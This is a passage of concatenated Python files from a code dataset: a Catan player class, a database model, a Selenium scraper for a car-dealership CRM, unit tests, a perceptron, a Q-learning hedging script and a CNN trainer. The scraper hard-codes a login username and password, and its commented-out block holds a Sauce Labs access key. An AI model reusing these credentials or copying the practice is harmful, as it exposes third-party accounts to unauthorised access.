Monopoly: \")\n            if dcard not in [\"Knight\", \"Road Building\", \"Year of Plenty\", \"Monopoly\"]:\n                print(\"can only play a Knight, Road Building, Year of Plenty, or Monopoly\")\n                continue\n            else:\n                break\n        if dcard == \"Knight\":\n            self.unplayedCards -= 1\n            self.playedCards.append(DevCard.KNIGHT)\n            #TODO add robber moves\n        elif dcard == \"Road Building\":\n            for n in range(2):\n                fromL = inValLoc(\"From which location? (x,y)\")\n                toL = inValLoc(\"To which location? 
(x,y)\")\n self.board.buildRoad(self.color, fromL, toL)\n #TODO finish other dev cards\n # elif dcard == \"Year of Plenty\":\n # elif dcard == \"Monopoly\":\n\n def playTurn(self):\n print(\"\")\n print(\"Current Turn: {}\".format(self.color))\n roll = inValRoll(\"What did they roll?: \")\n self.board.payout(roll)\n action = None\n while action != \"end\":\n action = inAction(\"What Action? (build, trade, ask, devcard, end): \")\n if action == \"build\":\n self.build()\n elif action == \"trade\":\n self.trade()\n elif action == \"ask\":\n # TODO\n pass\n elif action == \"devcard\":\n self.playDevcard()\n #TODO add check board state for longest road/largest army. (and winner?)\n print(\"Ending Turn\")\n\n\nclass Computer(Player):\n def __init__(self, color, board):\n Player.__init__(self, color, board)\n\n def initPlace(self):\n # TODO: Make this a real function. Currently does random selection\n validSetts = self.board.validInitSetPlace()\n print(\"BEEP BOOP BEEP BOOP\")\n print(\"A.A.R.O.N. IS THINKING\")\n print(\"A.A.R.O.N. Completed Initial Placement\")\n nodeChoice = random.choice(validSetts)\n neighbors = list(self.board.nodelist[nodeChoice].neighbors.keys())\n possRoads = [loc for loc in self.board.nodelist if self.board.nodelist[loc] in neighbors]\n roadChoice = random.choice(possRoads)\n self.board.buildSettle(self.color, nodeChoice)\n self.board.buildRoad(self.color, nodeChoice, roadChoice)\n\n def playTurn(self):\n # TODO: Need to implement\n pass\n","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":9536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"384090107","text":"from nameko.rpc import rpc\nfrom model import Model, Sequential\nfrom mongokit import *\nimport datetime\nimport time\n\n\nclass Orders(Model):\n __database__ = 'test'\n __collection__ = 'example'\n structure = {\n 'order_id': int,\n 'status': str,\n 'total_price': str,\n 'coupon_price': str,\n 'express_price': str,\n 'real_price': str,\n 'payment': str,\n 'pay_status': str,\n 'order_time': int,\n 'close_time': int,\n 'is_paid': bool,\n 'is_deleted': bool,\n }\n required_fields = [\n 'order_id',\n 'status',\n 'total_price',\n 'real_price',\n 'payment',\n 'pay_status',\n 'order_time',\n 'close_time',\n 'is_paid',\n ]\n default_values = {\n 'total_price': '0',\n 'real_price': '0',\n 'coupon_price': '0',\n 'express_price': '0',\n 'is_paid': False,\n 'is_deleted': False,\n }\n indexes = [\n {\n 'fields': 'order_id',\n 'unique': True,\n }\n ]\n ignore_keys = [\n 'is_deleted',\n ]\n struct_list = [k for k in structure]\n\n\n","sub_path":"model/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"49586208","text":"import time\nfrom datetime import date\nfrom functools import reduce\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n'''browser = webdriver.Remote(command_executor=\"http://sandel153:b1eb82d6-e29a-4ee0-a29f-a8a82ffa56d6@ondemand.saucelabs.com:80/wd/hub\",\n desired_capabilities={\"browserName\" : \"chrome\",\n \"platform\": \"Windows 10\",\n \"version\" : \"65.0\",\n })'''\noption = webdriver.ChromeOptions()\noption.add_argument(\" — incognito\")\nbrowser = webdriver.Chrome(executable_path='/usr/local/bin/chromedriver', 
chrome_options=option)\nbrowser.get(\"https://www.eleadcrm.com/evo2/fresh/login.asp\")\nbrowser.implicitly_wait(10)\nbrowser.maximize_window()\nbrowser.get(\"https://www.eleadcrm.com/evo2/fresh/login.asp\")\nusername = browser.find_element_by_id(\"user\")\npassword = browser.find_element_by_id(\"password\")\nusername.send_keys(\"Dealerfox\")\npassword.send_keys(\"2017eldf1\")\nlogin_attempt = browser.find_element_by_xpath(\"//*[@type='submit']\")\nlogin_attempt.click()\ndesklog_click = browser.find_element_by_xpath(\"//span[@id='tdDeskLogImage']\")\ndesklog_click.click()\niframe1 = browser.find_element_by_xpath('//iframe[contains(@id, \"Main\")]')\nbrowser.switch_to_frame(iframe1)\ntime.sleep(2)\n\nWebDriverWait(browser, 10).until(EC.presence_of_element_located((By.ID, 'Filters_chkWebUps')))\ncheck_internet = browser.find_element_by_xpath(\"//input[@id='Filters_chkWebUps']\")\ncheck_internet.click()\nWebDriverWait(browser, 10).until(EC.presence_of_element_located((By.ID, 'Filters_chkPhoneUps')))\ncheck_phone = browser.find_element_by_xpath(\"//input[@id='Filters_chkPhoneUps']\")\ncheck_phone.click()\nWebDriverWait(browser, 10).until(EC.presence_of_element_located((By.ID, 'Filters_chkCampaignUps')))\ncheck_campaign = browser.find_element_by_xpath(\"//input[@id='Filters_chkCampaignUps']\")\ncheck_campaign.click()\n\ntime.sleep(5)\nWebDriverWait(browser, 20).until(EC.presence_of_element_located((By.XPATH, '//table[@id=\"results\"]')))\nnum_customers = browser.find_elements_by_xpath('//table[@id=\"results\"]/tbody/tr')\nnum_customers = len(num_customers)\nprint(num_customers)\n\nresult = {}\nmonth = int(date.today().strftime(\"%m\"))\nday = int(date.today().strftime(\"%d\"))\nyear = int(date.today().strftime(\"%y\"))\nmonth_of_year = date.today().strftime(\"%b\")\nday_of_week = date.today().strftime(\"%a\")\ntoday = \"{}/{}/{}\".format(month, day, year)\n\nfor record in range(0, num_customers):\n if record > 0:\n WebDriverWait(browser, 20).until(\n EC.presence_of_element_located((By.ID, 'Main')))\n iframe_child = browser.find_element_by_xpath('//iframe[contains(@id, \"Main\")]')\n browser.switch_to.frame(iframe_child)\n WebDriverWait(browser, 10).until(\n EC.presence_of_element_located((By.ID, 'DataPanel_ContentMain_CustomerName_{}'.format(record))))\n script = \"document.getElementById('DataPanel_ContentMain_CustomerName_{}').scrollIntoView();\".format(record)\n browser.execute_script(script)\n temp_table = WebDriverWait(browser, 10).until(\n EC.element_to_be_clickable((By.XPATH, \"//a[@id='DataPanel_ContentMain_CustomerName_{}']\".format(record))))\n temp_table.click()\n if len(browser.window_handles) > 0:\n browser.switch_to.window(browser.window_handles[1])\n time.sleep(5)\n browser.execute_script(\n \"var i = document.getElementById('OpportunityPanel_ViewPrevOpptyLink'); if (i != null) {i.click()};\")\n source_type_panel = browser.find_elements_by_xpath(\n \"//*[@id='OpportunityPanel_ActiveOpptyPanel']/table/tbody/tr[6]/td\")\n source_type = source_type_panel[1].text.strip()\n rep_row = browser.find_elements_by_xpath(\n \"//*[@id='OpportunityPanel_ActiveOpptyPanel']/table/tbody/tr[5]/td\")\n rep_name = rep_row[1].text.split('-')[0].strip()\n source_detail_panel = browser.find_elements_by_xpath(\n \"//*[@id='OpportunityPanel_ActiveOpptyPanel']/table/tbody/tr[7]/td\")\n source_detail = source_detail_panel[1].text.strip()\n\n if 'Online Shopper' in source_detail:\n source_detail = 'Online Shopper'\n if 'Repeat' in source_detail:\n source_detail = 'Previous Customer'\n elif '|' in 
source_detail:\n source_detail = source_detail.split('|')\n source_detail = source_detail[-1].strip()\n if source_detail == 'Dealer Website':\n source_detail = 'Online Shopper'\n\n if source_type not in result.keys():\n result[source_type] = {}\n\n if source_detail not in result[source_type].keys():\n result[source_type][source_detail] = {'L': 1, 'A': 0, 'S': 0, 'C': 0}\n else:\n result[source_type][source_detail]['L'] += 1\n\n iframe1 = browser.find_element_by_id('tabsTargetFrame')\n browser.switch_to.frame(iframe1)\n\n oddRows = browser.find_elements_by_class_name(\"odd\")\n evenRows = browser.find_elements_by_class_name(\"even\")\n\n for i in oddRows:\n s = i.text\n s = s.split('\\n')\n s = [x for x in s if x]\n t = [i.split(' ') for i in s]\n if len(t) > 0:\n import operator\n\n flat_list = reduce(operator.add, t)\n flat_list = [x for x in flat_list if x]\n if today in flat_list and ('View' in flat_list[-2] or 'View' in flat_list[-3]):\n if 'Appointment' in s[1] :\n result[source_type][source_detail]['A'] += 1\n print(' Appointment : ',s)\n\n if today in flat_list and 'Complete' in flat_list[-2] and 'Edit' in flat_list[-1]:\n if 'Appointment' in s[1]:\n result[source_type][source_detail]['A'] += 1\n print(' Appointment : ',s)\n\n if today in flat_list and ('View' in flat_list[-2] or 'View' in flat_list[-3]):\n if 'Show' in flat_list[4] or 'Show' in flat_list[5]:\n result[source_type][source_detail]['S'] += 1\n print(' Shown : ',s)\n\n for i in evenRows:\n s = i.text\n s = s.split('\\n')\n s = [x for x in s if x]\n t = [i.split(' ') for i in s]\n if len(t) > 0:\n import operator\n flat_list = reduce(operator.add, t)\n flat_list = [x for x in flat_list if x]\n if today in flat_list and ('View' in flat_list[-2] or 'View' in flat_list[-3]):\n if 'Appointment' in s[1]:\n result[source_type][source_detail]['A'] += 1\n print(' Appointment : ', s)\n if today in flat_list and 'Complete' in flat_list[-2] and 'Edit' in flat_list[-1]:\n if 'Appointment' in s[1]:\n result[source_type][source_detail]['A'] += 1\n print(' Appointment : ', s)\n\n if today in flat_list and ('View' in flat_list[-2] or 'View' in flat_list[-3]):\n if ('Show' in flat_list[3]) and ('No Show' not in flat_list[3]):\n result[source_type][source_detail]['S'] += 1\n print(' Shown : ', s)\n WebDriverWait(browser, 10).until(EC.presence_of_element_located((By.ID, 'gvOpptyHistory')))\n div_comp_contacts = browser.find_element_by_id('gvOpptyHistory')\n rows_cch = div_comp_contacts.find_elements_by_tag_name('tr')\n if 'Sold - CRM Sold' in rows_cch[0].text or 'Sold - DMS Sold' in rows_cch[0].text and date.today().strftime(\"%m/%d/%y\") in rows_cch[0].text:\n result[source_type][source_detail]['C'] += 1\n browser.close()\n browser.switch_to.window(browser.window_handles[0])\nbrowser.quit()\ncount = -1\ndf = pd.DataFrame(columns=['Date', 'month', 'Day of week', 'source_type', 'source_detail', 'L', 'A', 'S', 'C'])\nfor src_type in result:\n for src in result[src_type]:\n count += 1\n df.loc[count] = [today, month_of_year, day_of_week, src_type.strip(), src.strip(), result[src_type][src]['L'],\n result[src_type][src]['A'], result[src_type][src]['S'], result[src_type][src]['C']]\ntoday = \"{}-{}-{}\".format(month, day, year)\ndf.to_csv('LASC_{}.csv'.format(today))\n# time.sleep(1)\n# import boto3\n#\n# s3 = boto3.resource('s3')\n# data = open('LASC_{}.csv'.format(today), 'rb')\n# s3.Bucket('eleads-scraper-data').put_object(Key='LASC/LASC_{}.csv'.format(today), 
Body=data)","sub_path":"Eleads/Eleads-current.py","file_name":"Eleads-current.py","file_ext":"py","file_size_in_byte":8619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"374475279","text":"import os\nimport sys\nimport shutil\nimport tempfile\n\nimport numpy\nimport vigra\n\nfrom lazyflow.utility import PathComponents\nfrom lazyflow.graph import Graph\nfrom lazyflow.operators.ioOperators import OpInputDataReader, OpStackLoader\nfrom lazyflow.operators.opReorderAxes import OpReorderAxes\n\nclass TestOpStackLoader(object):\n \n # TODO: Test with multiple channels.\n \n def setUp(self):\n self._tmp_dir = tempfile.mkdtemp()\n \n def tearDown(self):\n shutil.rmtree(self._tmp_dir)\n \n def _prepare_data_zyx(self):\n file_base = self._tmp_dir + \"/rand_3d\"\n \n X,Y = (100,100)\n Z = 10\n rand_data_3d = numpy.random.random((Z, Y, X))\n rand_data_3d *= 256\n rand_data_3d = rand_data_3d.astype(numpy.uint8)\n rand_data_3d = vigra.taggedView( rand_data_3d, 'zyx' )\n \n for z in range(Z):\n file_name = file_base + \"_z{}.tiff\".format(z)\n vigra.impex.writeImage( rand_data_3d[z,:,:], file_name )\n \n return ( rand_data_3d, file_base + \"*.tiff\" )\n \n def test_xyz(self):\n expected_volume_zyx, globstring = self._prepare_data_zyx()\n \n graph = Graph()\n op = OpStackLoader( graph=graph )\n op.globstring.setValue( globstring )\n \n assert len(op.stack.meta.axistags) == 4\n assert op.stack.meta.getAxisKeys() == list('xyzc')\n assert op.stack.meta.dtype == expected_volume_zyx.dtype\n \n vol_from_stack_xyzc = op.stack[:].wait()\n vol_from_stack_xyzc = vigra.taggedView( vol_from_stack_xyzc, 'xyzc' )\n vol_from_stack_zyx = vol_from_stack_xyzc.withAxes( *'zyx' )\n \n assert ( vol_from_stack_zyx == expected_volume_zyx ).all(), \"3D Volume from stack did not match expected data.\"\n\n def _prepare_data_tzyx(self):\n file_base = self._tmp_dir + \"/rand_4d\"\n \n X,Y = (100,100)\n Z = 10\n T = 5\n rand_data_4d = numpy.random.random((T, Z, Y, X))\n rand_data_4d *= 256\n rand_data_4d = rand_data_4d.astype(numpy.uint8)\n rand_data_4d = vigra.taggedView( rand_data_4d, 'tzyx' )\n\n for t in range(T): \n file_name = file_base + \"_t{}.tiff\".format(t)\n for z in range(Z):\n vigra.impex.writeImage( rand_data_4d[t, z,:,:], file_name, mode='a' )\n \n return ( rand_data_4d, file_base + \"*.tiff\" )\n\n def test_txyz(self):\n expected_volume_tzyx, globstring = self._prepare_data_tzyx()\n \n graph = Graph()\n op = OpStackLoader( graph=graph )\n op.globstring.setValue( globstring )\n \n assert len(op.stack.meta.axistags) == 5\n assert op.stack.meta.getAxisKeys() == list('txyzc')\n assert op.stack.meta.dtype == expected_volume_tzyx.dtype\n \n vol_from_stack_txyzc = op.stack[:].wait()\n vol_from_stack_txyzc = vigra.taggedView( vol_from_stack_txyzc, 'txyzc' )\n vol_from_stack_tzyx = vol_from_stack_txyzc.withAxes( *'tzyx' )\n \n assert ( vol_from_stack_tzyx == expected_volume_tzyx ).all(), \"4D Volume from stack did not match expected data.\"\n \n\nif __name__ == \"__main__\":\n import sys\n import nose\n sys.argv.append(\"--nocapture\") # Don't steal stdout. Show it on the console as usual.\n sys.argv.append(\"--nologcapture\") # Don't set the logging level to DEBUG. 
+{"seq_id":"252656650","text":"# A tiny perceptron (\"ganzhiqi\") that learns the logical AND function.\nclass node:\n    def __init__(self, x, y):\n        self.x = x\n        self.y = y\n        self.ans = x & y\n\nclass gan:\n    def __init__(self, kx):\n        self.kxin = kx  # learning rate\n        self.b = 0\n        self.dataset = []  # instance state; class-level lists would be shared across instances\n        self.w = [0, 0]\n        self.create_data()\n\n    def create_data(self):\n        for i in range(0, 2):\n            for j in range(0, 2):\n                self.dataset.append(node(i, j))\n\n    def train(self):\n        for epoch in range(0, 10):\n            for i in range(0, len(self.dataset)):\n                tmp = self.calu(self.dataset[i].x, self.dataset[i].y)\n                self.update(self.dataset[i], tmp)\n            self.debug()\n\n    def calu(self, x, y):\n        ans = self.f(self.w[0]*x + self.w[1]*y + self.b)\n        return ans\n\n    def update(self, t, cal):\n        self.w[0] = self.w[0] + self.kxin*(t.ans-cal)*t.x\n        self.w[1] = self.w[1] + self.kxin*(t.ans-cal)*t.y\n        self.b = self.b + self.kxin*(t.ans-cal)\n\n    def debug(self):\n        print('w[0]: %f\\n' % self.w[0])\n        print('w[1]: %f\\n' % self.w[1])\n        print('b: %f\\n' % self.b)\n\n    def f(self, x):\n        if x > 0:\n            return 1\n        else:\n            return 0\n\n\ntg = gan(0.1)\ntg.train()\nfor i in range(0, 5):\n    x = input(\"please input x:\")\n    y = input(\"please input y:\")\n    print(\"value: %d\\n\" % int(tg.calu(float(x), float(y))))\n","sub_path":"ganzhiqi.py","file_name":"ganzhiqi.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
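Since ganzhiqi.py above prompts interactively, here is a non-interactive sketch of the same perceptron-learns-AND loop that checks the full truth table; `train_and` and `step` are illustrative names, not part of the original file:

```python
# Standalone perceptron on the AND truth table: same update rule as the record above.
def step(z):
    return 1 if z > 0 else 0

def train_and(lr=0.1, epochs=10):
    w, b = [0.0, 0.0], 0.0
    data = [(x, y, x & y) for x in (0, 1) for y in (0, 1)]
    for _ in range(epochs):
        for x, y, target in data:
            err = target - step(w[0] * x + w[1] * y + b)
            w[0] += lr * err * x
            w[1] += lr * err * y
            b += lr * err
    return w, b

w, b = train_and()
for x in (0, 1):
    for y in (0, 1):
        print(x, y, step(w[0] * x + w[1] * y + b))  # matches x & y
```

AND is linearly separable, so the perceptron convergence theorem guarantees this settles within a handful of epochs.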
+{"seq_id":"411449753","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division, print_function, unicode_literals\n\nimport unittest\n\nfrom os.path import abspath, dirname\nfrom nlp_sum.my_sum.utils import get_stop_words\nfrom nlp_sum.my_sum.parse.plaintext import PlaintextParser\nfrom nlp_sum.my_sum.method.extract_summarizer.nmf import NmfSummarizer\n\nfrom nlp_sum.my_sum.similarity.cosine_sim import compute_tf, compute_idf\nfrom nlp_sum.my_sum.similarity.cosine_sim import cosine_similarity\n\nfrom nlp_sum.test.utils_for_test import get_cn_sentence_length, get_en_sentence_length\n\n\nclass testNMF(unittest.TestCase):\n\n    def test_summarizer(self):\n        summarizer_en = NmfSummarizer(\"english\")\n        summarizer_en_stem = NmfSummarizer(\"english\", True)\n        summarizer_cn = NmfSummarizer(\"chinese\")\n\n        data_file_path = abspath(dirname(__file__)) + '/data'\n        cn_data_file_path = data_file_path + '/chinese/'\n        en_data_file_path = data_file_path + '/english/'\n        parser_cn = PlaintextParser(\"chinese\")\n        parser_en = PlaintextParser(\"english\")\n\n        document_set_cn = parser_cn.build_documentSet_from_dir(\n            cn_data_file_path\n        )\n        document_set_en = parser_en.build_documentSet_from_dir(\n            en_data_file_path\n        )\n\n        summarizer_cn.stop_words = get_stop_words(\"chinese\")\n        summarizer_en.stop_words = get_stop_words(\"english\")\n\n        summary_cn = summarizer_cn(document_set_cn, 100)\n        summary_cn_length = sum(get_cn_sentence_length(sentence) for sentence in summary_cn)\n        summary_cn_text = ''.join(sentence._texts + '。' for sentence in summary_cn)\n\n        # summary_cn_mmr = summarizer_cn(document_set_cn, 100, method=\"MMR\")\n        summary_cn_mmr = summarizer_cn(document_set_cn, 100, method=\"MMR\", metric=\"tfidf\")\n        summary_cn_mmr_length = sum(get_cn_sentence_length(sentence) for sentence in summary_cn_mmr)\n        summary_cn_text_mmr = ''.join(sentence._texts + '。' for sentence in summary_cn_mmr)\n\n        summary_en_tfidf = summarizer_en(document_set_en, 100, method=\"MMR\", metric=\"tfidf\")\n        summary_en_tfidf_length = sum(get_en_sentence_length(sentence) for sentence in summary_en_tfidf)\n        summary_en_text_tfidf = ' '.join(sentence._texts for sentence in summary_en_tfidf)\n\n        summary_en_mmr = summarizer_en(document_set_en, 100, method=\"MMR\")\n        summary_en_mmr_length = sum(get_en_sentence_length(sentence) for sentence in summary_en_mmr)\n        summary_en_text_mmr = ' '.join(sentence._texts for sentence in summary_en_mmr)\n\n        print(\"-----------------------------chinese default-------------------------------\")\n        print(summary_cn_text)\n        print(\"the summary length is {}\".format(summary_cn_length))\n        print(\"-----------------------------chinese MMR-------------------------------\")\n        print(summary_cn_text_mmr)\n        print(\"the summary length is {}\".format(summary_cn_mmr_length))\n        print(\"-----------------------------english tfidf-------------------------------\")\n        print(summary_en_text_tfidf)\n        print(\"the summary length is {}\".format(summary_en_tfidf_length))\n        print(\"-----------------------------english MMR-------------------------------\")\n        print(summary_en_text_mmr)\n        print(\"the summary length is {}\".format(summary_en_mmr_length))\n\n        self.assertLessEqual(summary_en_tfidf_length, 100)\n        self.assertLessEqual(summary_en_mmr_length, 100)\n        self.assertLessEqual(summary_cn_length, 100)\n        self.assertLessEqual(summary_cn_mmr_length, 100)\n\n        #diction = summarizer_cn._create_dictionary(document_set_cn)\n        #print(len(diction))\n        #sentence_number = [len(doc.sentences) for doc in document_set_cn.documents]\n        #print(sentence_number)\n","sub_path":"test/testNMF.py","file_name":"testNMF.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
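The method="MMR" option exercised by the test above trades relevance against redundancy. A generic sketch of the standard Maximal Marginal Relevance rule, score(c) = lam * rel(c) - (1 - lam) * max over selected s of sim(c, s), with toy numbers; this shows the general technique, not necessarily nlp_sum's exact implementation:

```python
# Greedy MMR selection over candidate sentence ids with toy relevance/similarity scores.
def mmr_select(candidates, relevance, similarity, k, lam=0.5):
    selected = []
    while candidates and len(selected) < k:
        def mmr_score(c):
            redundancy = max((similarity[c][s] for s in selected), default=0.0)
            return lam * relevance[c] - (1 - lam) * redundancy
        best = max(candidates, key=mmr_score)
        selected.append(best)
        candidates.remove(best)
    return selected

relevance = {'s1': 0.9, 's2': 0.85, 's3': 0.4}
similarity = {'s1': {'s2': 0.95, 's3': 0.1},
              's2': {'s1': 0.95, 's3': 0.2},
              's3': {'s1': 0.1, 's2': 0.2}}
# s2 is nearly a duplicate of s1, so MMR skips it despite its high relevance.
print(mmr_select(['s1', 's2', 's3'], relevance, similarity, k=2))  # ['s1', 's3']
```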
+{"seq_id":"68885128","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar  6 05:35:25 2019\r\n\r\n@author: wuxx1\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport time\r\nimport array as arr\r\nstart_time = time.time()\r\n\r\nN = 1000\r\nM = 5\r\nP_regulated = 12\r\nP_overhedge = 9\r\n\r\nS2 = [0, 0, 10, 5]\r\nQ2 = np.zeros((M,6))\r\nq3 = np.zeros((M,N,5))\r\nq2 = np.zeros((M,1,5))\r\n# Let us suppose I will have different P & D samples, then act based on different actions (0:16)\r\nprice_change = [1,-1]\r\nprice_probabilities = [0.5,0.5]\r\nPRAND = np.random.choice(price_change,N,p=price_probabilities)\r\n#PRAND = [1,-1,1]\r\ndemand_change = [1,-1]\r\ndemand_probabilities = [0.67,0.33]\r\nDRAND = np.random.choice(demand_change,N,p=demand_probabilities)\r\n#DRAND = - PRAND\r\n#DRAND = [-1,1,-1]\r\n\r\n# Stepsize\r\nalpha1 = 0.1\r\nalpha2 = 0.1\r\n# Gamma for Q-learning\r\ngamma = 1\r\n\r\n\r\nfor j in range(len(Q2)):\r\n    istart_time = time.time()\r\n    #temp = 2*(S2[3]-S2[1])\r\n    A2 = int(j)\r\n    #P3 = np.zeros(N,)\r\n    P3 = S2[2]+PRAND\r\n    #for l in range(len(PRAND)):\r\n    #    P3[l] = S2[2] + PRAND[l]\r\n\r\n    #D3 = np.zeros(N,)\r\n    #for l in range(len(DRAND)):\r\n    #    D3[l] = S2[3] + DRAND[l]\r\n    D3 = S2[3]+DRAND\r\n\r\n    S3 = np.zeros((N,4))\r\n    for i in range(N):\r\n        if S2[1]+A2 == 0:\r\n            S3[i] = [0, 0, P3[i], D3[i]]\r\n        else:\r\n            S3[i] = [(S2[0]*S2[1]+S2[2]*A2)/(S2[1]+A2), S2[1]+A2, P3[i], D3[i]]\r\n\r\n    # For every S3, I will generate 500 S_4\r\n    P4 = np.zeros((len(S3),N))\r\n    D4 = np.zeros((len(S3),N))\r\n    A3 = np.arange(0, 2*(abs(max(S3[:,1]-S3[:,3])))+2, 1)\r\n    S4 = np.zeros((len(S3),N,len(A3),4))\r\n\r\n    for k in range(len(A3)):\r\n        for l in range(len(S3)):\r\n            P4[l,:] = P3[l]+PRAND\r\n            D4[l,:] = D3[l]+DRAND\r\n            for i in range(N):\r\n                if S3[l,1]+A3[k] == 0:\r\n                    S4[l,i,k,:] = [0,0,P4[l,i],D4[l,i]]\r\n                else:\r\n                    S4[l,i,k,:] = [(S3[l,0]*S3[l,1]+S3[l,2]*A3[k])/(S3[l,1]+A3[k]),S3[l,1]+A3[k],P4[l,i],D4[l,i]]\r\n\r\n\r\n    # Calculate Q_4(S4), all my boundary conditions\r\n    Q4 = np.zeros((len(S3),N,len(A3),6))\r\n    for k in range(len(A3)):\r\n        for l in range(len(S3)):\r\n            for i in range(N):\r\n                Q4[l,i,k,:] = [S4[l,i,k,0],S4[l,i,k,1], S4[l,i,k,2],S4[l,i,k,3], A3[k],P_regulated*D4[l,i]-S4[l,i,k,0]*S4[l,i,k,1]-P4[l,i]*max(D4[l,i]-S4[l,i,k,1],0)-P_overhedge*max(-D4[l,i]+S4[l,i,k,1],0)]\r\n\r\n    # Backpropagation Q-learning\r\n    # Actually, I don't need to track every update for my Q_{N-1}(S,a). However, for now, I would like to understand the details of updating.\r\n    # I will first recall a typical Q-learning method:\r\n    \"\"\"\r\n    Initialize Q(S,a)\r\n    Repeat (for each episode):\r\n        Initialize S\r\n        Repeat (for each step of episode):\r\n            Choose a from S using policy derived from Q (e.g. epsilon-greedy)\r\n            Take action a, observe r, S'\r\n            Q(S,a) <-- Q(S,a) + alpha*[r + gamma max_a' Q(S',a') - Q(S,a)]\r\n            S <-- S'\r\n        Until S is terminal\r\n    \"\"\"\r\n    # My main function will be Q_{N-1}(S,a) = Q_{N-1}(S,a) + alpha*[0 + gamma*Q_N(S') - Q_{N-1}(S,a)]\r\n\r\n\r\n#if False:\r\n    # Compute Q3 based on Q4, all the boundary conditions\r\n    Q3 = np.zeros((len(S3),len(A3),6))\r\n    for k in range(len(A3)):\r\n        for l in range(len(S3)):\r\n            for i in range(N):\r\n                Q3[l,k,:] = [S3[l,0],S3[l,1],S3[l,2],S3[l,3],A3[k],Q3[l,k,5] + alpha1*(0 + gamma*Q4[l,i,k,5] - Q3[l,k,5])]\r\n                alpha1 = 1/(i+1)\r\n\r\n    # Compute Q2 based on Q3\r\n    for l in range(N):\r\n        Q2[j,:] = [S2[0],S2[1],S2[2],S2[3],A2,Q2[j,5]+alpha2*(0+gamma*max(Q3[l,:,5]) - Q2[j,5])]\r\n        alpha2 = 1/(l+1)\r\n\r\n\r\n    for l in range(len(S3)):\r\n        Index = np.argmax(Q3[l,:,5])\r\n        q3[j,l,:] = [S3[l,0],S3[l,1],S3[l,2],S3[l,3],Q3[l,Index,4]]\r\n\r\n\r\n    print(\"This iteration--- %s seconds ---\" % (time.time() - istart_time))\r\n#if False:\r\n    for l in range(len(Q2)):\r\n        Index = np.argmax(Q2[:,5])\r\n        q2[j,:] = [S2[0],S2[1],S2[2],S2[3],Q2[Index,4]]\r\n\r\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\r\n","sub_path":"python/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
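Stripped of the hedging-specific state, the update inside the nested loops above is the standard tabular Q-learning step. A minimal self-contained version on a toy two-state chain (gamma < 1 here so the toy values converge; the script above uses gamma = 1 over a finite horizon):

```python
import random

# Plain tabular Q-learning on a toy two-state, two-action chain; all numbers illustrative.
alpha, gamma = 0.1, 0.9
Q = {(s, a): 0.0 for s in (0, 1) for a in (0, 1)}

def env_step(state, action):
    # toy dynamics: taking action 1 in state 0 pays off and moves to state 1
    next_state = 1 if action == 1 else 0
    reward = 1.0 if (state == 0 and action == 1) else 0.0
    return next_state, reward

state = 0
for _ in range(2000):
    action = random.choice((0, 1))                       # exploratory behavior policy
    next_state, reward = env_step(state, action)
    best_next = max(Q[(next_state, a)] for a in (0, 1))  # max_a' Q(S', a')
    Q[(state, action)] += alpha * (reward + gamma * best_next - Q[(state, action)])
    state = next_state

print(Q)  # Q[(0, 1)] should settle near 1 / (1 - gamma**2), about 5.26
```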
+{"seq_id":"414868999","text":"import numpy as np\r\nfrom configargparse import ArgParser\r\nimport torch\r\nimport torch.utils.data as Data\r\nfrom torch.optim import lr_scheduler\r\nfrom torchnet.meter import AverageValueMeter\r\nfrom tqdm import tqdm\r\nimport os\r\nimport torch.nn.functional as F\r\n\r\nclass myCNN(torch.nn.Module):\r\n    def __init__(self, input_channel, output_feature_seq_length, Height, Width, out_channel=48, kernel_size=3, stride=3):\r\n        \"\"\"\r\n        :param input_channel: number of input channels\r\n        :param output_feature_seq_length: length of the flattened output feature vector\r\n        :param Height: input height\r\n        :param Width: input width\r\n        :param out_channel: number of convolution filters\r\n        :param kernel_size: convolution kernel size\r\n        :param stride: convolution stride\r\n        \"\"\"\r\n        super(myCNN, self).__init__()\r\n        self.HeightNew = (Height - kernel_size) // stride + 1\r\n        self.WidthNew = (Width - kernel_size) // stride + 1\r\n        self.cnn = torch.nn.Conv2d(in_channels=input_channel, kernel_size=kernel_size, stride=stride, out_channels=out_channel)\r\n        self.dense = torch.nn.Linear(in_features=out_channel * self.HeightNew * self.WidthNew, out_features=output_feature_seq_length)\r\n\r\n    def forward(self, x):\r\n        x = self.cnn(x)\r\n        x = F.relu(x, inplace=True)\r\n        x = x.view(x.shape[0], -1)\r\n        x = self.dense(x)\r\n        return x\r\n\r\ndef train_conv(net, lr, train_loader, total_epoch):\r\n    global_step = 1\r\n    optimizer = torch.optim.Adam(net.parameters(), lr=lr)\r\n    scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[i for i in range(0, 500, 150)][1:], gamma=0.05)\r\n    loss_func = torch.nn.MSELoss()\r\n    loss_metrics = AverageValueMeter()\r\n    # Load the mask once here instead of re-reading A.npy on every training step.\r\n    loadData = np.load('../../A.npy')\r\n    loadData = torch.tensor(loadData.reshape(loadData.shape[0] * loadData.shape[1]),\r\n                            dtype=torch.float32).cuda()\r\n    ########## training set ##########\r\n    for epoch in range(total_epoch):\r\n        epoch_loss = 0\r\n        for step, (x, y) in tqdm(enumerate(train_loader)):\r\n            output = net(x)\r\n            # train with the mask applied to both prediction and target\r\n            output = output * loadData\r\n            y = y * loadData\r\n            train_loss = loss_func(output, 